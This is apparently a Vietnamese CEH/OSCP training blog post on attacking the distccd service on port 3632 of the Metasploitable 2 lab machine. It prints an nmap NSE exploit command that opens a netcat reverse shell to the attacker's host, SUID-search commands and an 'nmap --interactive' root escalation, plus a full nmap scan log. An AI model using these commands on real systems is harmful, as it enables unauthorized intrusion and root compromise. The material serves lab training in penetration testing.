Các bạn hãy xem kết quả của quá trình dò quét với nmap , ta đã đánh giá port 21 và bây giờ chuyển qua port 3632 của dịch vụ distccd . Các bạn có thể chọn port từ thấp đến cao hay theo thứ tự nào mà minh thích, cứ cái nào dễ làm trước , khó làm sau hay ngược lại tùy sở thích.
Xem p1 [CEH v11 – OSCP v2] Target Metasploitable 2 – Hacking qua Port 21 của VSFTPD
Xem bài làm của học viên các lớp trước khai thác lỗi này và leo thang qua UDEV
Tham khảo chơi theo cách dễ tại đây , tuy nhiên đến với CEH VIETNAM các bạn nên chơi khó hơn. Hãy tìm cách khác để thâm nhập và leo thang theo cách dễ hiểu hơn, khoa hơn cách làm “mò” như trong bài của Web CSS
Hãy chờ video và bài hướng dẫn trong tối nay, các bạn học viên hãy làm bài tập …
Sau đây là bài minh họa cách khai thác distcc v1 sử dụng nmap nse với cú pháp
#nmap -p 3632 –script distcc-cve2004-2687 –script-args=”distcc-cve2004-2687.cmd=’nc -e /bin/sh 192.168.75.136 5555′” 192.168.75.131 -Pn
Các bạn nhớ hứng với nc -nlvp 5555
Bài Hướng Dẫn
Như vậy ta đã có shell nhưng shell này còn dỏm, các bạn phải nâng shell như bài hướng dẫn tại đây và video bài học sau đây …. (nâng cấp lên TTY Shell qua python)
Bây giờ, với TTY Shell các bạn có thể tìm các phương án để leo thang đạc quyền lấy root.
1 — tim lỗi của kernel ví dụ ở đây các bạn chạy uname -a và tìm kiếm sẽ thấy nhân có lỗi UDEV mà trong bài minh họa của học viên có trình bày. Hoặc tham khảo trên NULL BTE
2 — tìm các tiến trình có set SUID bit, với các lệnh như sau
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
các bạn thấy có /user/bin/nmap (có thể có những tiến trình hay dịch vụ khác, xem chi tiết 2 bài viết của pentest blog và hackingarticle mà CEH VIETNAM có tổng hợp sẵn trong Cyber Kill Chain cho dễ tìm là : leo-thang-dac-quyen-qua-suid-executables : https://cehvietnam.com/2021/03/04/leo-thang-dac-quyen-qua-suid-executables/
Bây giờ, ta có thể chạy lệnh
nmap –interactive
rồi
nmap> !sh
sh-3.2# whoami
root
chi tiết qua bài trình bày sau đây ……….
root@kali:~# nmap -p- 192.168.75.131 -sC -sV -O -v
Starting Nmap 7.70 ( https://nmap.org ) at 2021-03-04 03:18 EST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:18
Completed NSE at 03:18, 0.00s elapsed
Initiating NSE at 03:18
Completed NSE at 03:18, 0.00s elapsed
Initiating ARP Ping Scan at 03:18
Scanning 192.168.75.131 [1 port]
Completed ARP Ping Scan at 03:18, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:18
Completed Parallel DNS resolution of 1 host. at 03:18, 0.07s elapsed
Initiating SYN Stealth Scan at 03:18
Scanning 192.168.75.131 [65535 ports]
Discovered open port 111/tcp on 192.168.75.131
Discovered open port 3306/tcp on 192.168.75.131
Discovered open port 139/tcp on 192.168.75.131
Discovered open port 53/tcp on 192.168.75.131
Discovered open port 5900/tcp on 192.168.75.131
Discovered open port 21/tcp on 192.168.75.131
Discovered open port 25/tcp on 192.168.75.131
Discovered open port 445/tcp on 192.168.75.131
Discovered open port 22/tcp on 192.168.75.131
Discovered open port 80/tcp on 192.168.75.131
Discovered open port 23/tcp on 192.168.75.131
Discovered open port 1524/tcp on 192.168.75.131
Discovered open port 1099/tcp on 192.168.75.131
Discovered open port 43592/tcp on 192.168.75.131
Discovered open port 8787/tcp on 192.168.75.131
Discovered open port 514/tcp on 192.168.75.131
Discovered open port 512/tcp on 192.168.75.131
Discovered open port 60974/tcp on 192.168.75.131
Discovered open port 5432/tcp on 192.168.75.131
Discovered open port 3632/tcp on 192.168.75.131
Discovered open port 513/tcp on 192.168.75.131
Discovered open port 37522/tcp on 192.168.75.131
Discovered open port 6000/tcp on 192.168.75.131
Discovered open port 2121/tcp on 192.168.75.131
Discovered open port 8180/tcp on 192.168.75.131
Discovered open port 6667/tcp on 192.168.75.131
Discovered open port 44044/tcp on 192.168.75.131
Discovered open port 6697/tcp on 192.168.75.131
Discovered open port 2049/tcp on 192.168.75.131
Discovered open port 8009/tcp on 192.168.75.131
Completed SYN Stealth Scan at 03:18, 6.91s elapsed (65535 total ports)
Initiating Service scan at 03:18
Scanning 30 services on 192.168.75.131
Completed Service scan at 03:20, 121.19s elapsed (30 services on 1 host)
Initiating OS detection (try #1) against 192.168.75.131
NSE: Script scanning 192.168.75.131.
Initiating NSE at 03:20
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 03:22, 74.68s elapsed
Initiating NSE at 03:22
Completed NSE at 03:22, 0.02s elapsed
Nmap scan report for 192.168.75.131
Host is up (0.00060s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.75.135
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2021-03-03T03:36:28+00:00; -1d04h44m29s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 44044/tcp mountd
| 100005 1,2,3 44132/udp mountd
| 100021 1,3,4 55388/udp nlockmgr
| 100021 1,3,4 60974/tcp nlockmgr
| 100024 1 43592/tcp status
|_ 100024 1 46182/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open java-rmi Java RMI Registry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 10
| Capabilities flags: 43564
| Some Capabilities: Support41Auth, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, SupportsCompression, LongColumnFlag, SupportsTransactions
| Status: Autocommit
|_ Salt: xoHVX8KTB0g9'TQ{:MT=
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2021-03-03T03:36:27+00:00; -1d04h44m30s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
37522/tcp open java-rmi Java RMI Registry
43592/tcp open status 1 (RPC #100024)
44044/tcp open mountd 1-3 (RPC #100005)
60974/tcp open nlockmgr 1-4 (RPC #100021)
MAC Address: 00:0C:29:2D:54:D7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.779 days (since Wed Mar 3 08:39:47 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1d03h04m29s, deviation: 2h53m13s, median: -1d04h44m29s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2021-03-02T22:36:26-05:00
|_smb2-time: Protocol negotiation failed (SMB2)
NSE: Script Post-scanning.
Initiating NSE at 03:22
Completed NSE at 03:22, 0.00s elapsed
Initiating NSE at 03:22
Completed NSE at 03:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.03 seconds
Raw packets sent: 65573 (2.886MB) | Rcvd: 65551 (2.623MB)
One thought on “[CEH v11 – OSCP v2] Target Metasploitable 2 {Một Bài Viết Dài – Bài Tập Tổng Quát} p2 : Pentest distccd port 3632”